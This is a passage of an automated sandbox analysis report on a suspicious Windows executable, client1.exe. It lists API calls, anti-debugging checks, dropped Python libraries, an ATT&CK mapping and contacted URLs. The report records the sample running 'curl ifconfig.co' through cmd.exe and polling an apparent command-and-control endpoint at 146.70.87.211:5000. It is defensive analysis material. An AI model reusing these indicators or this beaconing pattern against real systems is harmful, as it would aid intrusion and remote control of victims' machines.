Source: C:\Users\user\Desktop\client1.exeCode function: 2_2_00007FFBAAE83229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,2_2_00007FFBAAE83229
Source: client1.exe, 00000002.00000003.1476070498.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475442260.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475000813.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr
Source: client1.exe, 00000002.00000003.1488562521.0000016930580000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mllkkjihgfSLUZ\\\\\\\\\\\\\\\\\\\\
Source: curl.exe, 00000005.00000003.1485944623.00000249273D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cacert.pem.0.dr Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Anti Debugging

Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAAE8572C 2_2_00007FFBAAE8572C
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAAE84241 2_2_00007FFBAAE84241
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAAE8572C rdtsc 2_2_00007FFBAAE8572C
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F62B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79F62B69C
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F6425A0 GetProcessHeap,0_2_00007FF79F6425A0
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F62B880 SetUnhandledExceptionFilter,0_2_00007FF79F62B880
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F62AE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79F62AE00
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F639AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79F639AE4
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FF79F62B880 SetUnhandledExceptionFilter,2_2_00007FF79F62B880
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FF79F62B69C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF79F62B69C
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FF79F62AE00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF79F62AE00
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FF79F639AE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF79F639AE4
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAA710140 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAA710140
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAA710A68 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAA710A68
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAA733058 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAA733058
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAA732A90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAA732A90
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAB1C2070 SetUnhandledExceptionFilter,2_2_00007FFBAB1C2070
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAAE85A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAAE85A1F
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAB4A2D10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB4A2D10
Source: C:\Users\user\Desktop\client1.exe Process created: C:\Users\user\Desktop\client1.exe "C:\Users\user\Desktop\client1.exe"
Source: C:\Users\user\Desktop\client1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.co"
Source: C:\Users\user\Desktop\client1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl ifconfig.co
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F6489B0 cpuid 0_2_00007FF79F6489B0
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography-43.0.0.dist-info VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\Desktop\client1.exe VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pyd VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pyd VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pyd VolumeInformation
Source: C:\Users\user\Desktop\client1.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pyd VolumeInformation
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI40522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\Users\user\Desktop\client1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exeQueries volume information: C:\images\new214_173.254.250.69.png VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F62B580 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF79F62B580
Source: C:\Users\user\Desktop\client1.exe Code function: 0_2_00007FF79F644E20 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF79F644E20
Source: C:\Users\user\Desktop\client1.exe Code function: 2_2_00007FFBAAE82B5D bind,WSAGetLastError, 2_2_00007FFBAAE82B5D
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 11 Process Injection | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 1 System Network Configuration Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 22 System Information Discovery | SSH | Keylogging | 2 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
[Behavior graph. ID: 1548293, Sample: client1.exe, Startdate: 04/11/2024, Architecture: WINDOWS, Score: 56]

  • Sample signatures: Machine Learning detection for sample; Uses known network protocols on non-standard ports; AI detected suspicious sample
  • client1.exe (started): dropped C:\Users\user\AppData\...\unicodedata.pyd, C:\Users\...\_speedups.cp311-win_amd64.pyd, C:\Users\user\AppData\Local\...\select.pyd (all PE32+) and 20 other files (none is malicious); signature: Potentially malicious time measurement code found
  • client1.exe (child process, started): DNS/IP 146.70.87.211, 49706, 49710, 49711, TENET-1ZA, United Kingdom; started two cmd.exe processes
  • cmd.exe (started): started curl.exe and conhost.exe; curl.exe DNS/IP: ifconfig.co 172.67.168.106, 49709, 80, CLOUDFLARENETUS, United States, and 127.0.0.1
  • cmd.exe (started): started conhost.exe

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| client1.exe | 5% | ReversingLabs | | |
| client1.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\_MEI40522\VCRUNTIME140.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\_ssl.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\bcrypt\_bcrypt.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md.cp311-win_amd64.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\charset_normalizer\md__mypyc.cp311-win_amd64.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\cryptography\hazmat\bindings\_rust.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\libcrypto-1_1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\libffi-8.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\libssl-1_1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\python3.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\python311.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\select.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\simplejson\_speedups.cp311-win_amd64.pyd | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\_MEI40522\unicodedata.pyd | 0% | ReversingLabs | | |
No Antivirus matches
No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ifconfig.co | 172.67.168.106 | true | false | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://ifconfig.co/ | false | Avira URL Cloud: safe | unknown |
| http://146.70.87.211:5000/clients/996/commands | false | Avira URL Cloud: safe | unknown |
    • Avira URL Cloud: safe
    unknown
    http://yahoo.com/client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://docs.scipy.org/doc/numpy/reference/arrays.interface.htmlclient1.exe, 00000002.00000002.2692478911.000001692F100000.00000004.00001000.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6client1.exe, 00000002.00000003.1476070498.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475442260.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1492430826.000001692E9A0000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475000813.000001692E63F000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475140848.000001692E9C2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1490021995.000001692E9A0000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691501664.000001692E9A0000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://146.70.87.211:5000/clients/996/commandspclient1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2692478911.000001692F178000.00000004.00001000.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://146.70.87.211:5000rclient1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475247941.000001692E564000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E55D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://cacerts.digicert.coclient1.exe, 00000000.00000003.1448897048.00000262AABD2000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://w3c.github.io/html/sec-forms.html#multipart-form-dataclient1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://cryptography.io/en/latest/changelog/client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/urllib3/urllib3/issues/49client1.exe, 00000002.00000002.2690809690.000001692E6EB000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475000813.000001692E6EB000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475442260.000001692E6EB000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476070498.000001692E6EB000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E6EB000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://146.70.87.211:5000client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://www.iana.org/time-zones/repository/tz-link.htmlclient1.exe, 00000002.00000003.1473810890.000001692E3A3000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://mail.python.org/mailman/listinfo/cryptography-devclient1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
    • Avira URL Cloud: safe
    unknown
    https://nextcl.online/remote.php/dav/files/root/ngclient1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
